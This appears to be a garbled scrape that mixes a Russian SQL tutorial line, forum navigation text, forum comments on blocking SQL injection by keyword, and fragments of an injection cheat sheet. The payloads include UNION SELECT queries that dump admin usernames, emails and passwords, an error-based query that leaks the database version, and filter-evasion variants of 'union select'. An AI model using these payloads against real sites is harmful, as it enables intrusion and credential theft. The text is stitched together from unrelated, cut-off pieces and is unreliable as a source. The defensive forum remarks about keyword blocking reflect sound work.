CHAR() (SM): SELECT CHAR(64) Переводит ASCII-код в соответствующий символ. 9. Оператор UNION С оператором UNION можно делать запросы к пересечению таблиц.
Display results as threads. More... Useful Searches.
So, as it's being used a lot, I would submit my answer. In my opinion, the aim of these requests is to check the presence or absence of a sql injection.
SQL Injection Cheet Sheet"},{"string": 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects
...(select+concat(0x7e,0x27,unhex(Hex(cast(a_admin.email+as+char))),0x5e,unhex(Hex(cast(a_admin.password+as+char))),0x5e,unhex(Hex
You can clearly see rules containing keywords "select", "union", "all" etc.
On my site, for instance, it's entirely safe to fail any request with the string 'concat' or %20union' or 'information_schema'. Indeed, I can even ban any IP that so much as bothers to attempt a request including such strings.
union all select id =null union all select id =1 +and+ false + union +all +select id = 9999 union all select +union+distinct+select+ +union+distinctROW+select+
+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))). URL will look like
-1 UNION SELECT group_concat(username, 0x3a, password) FROM admin.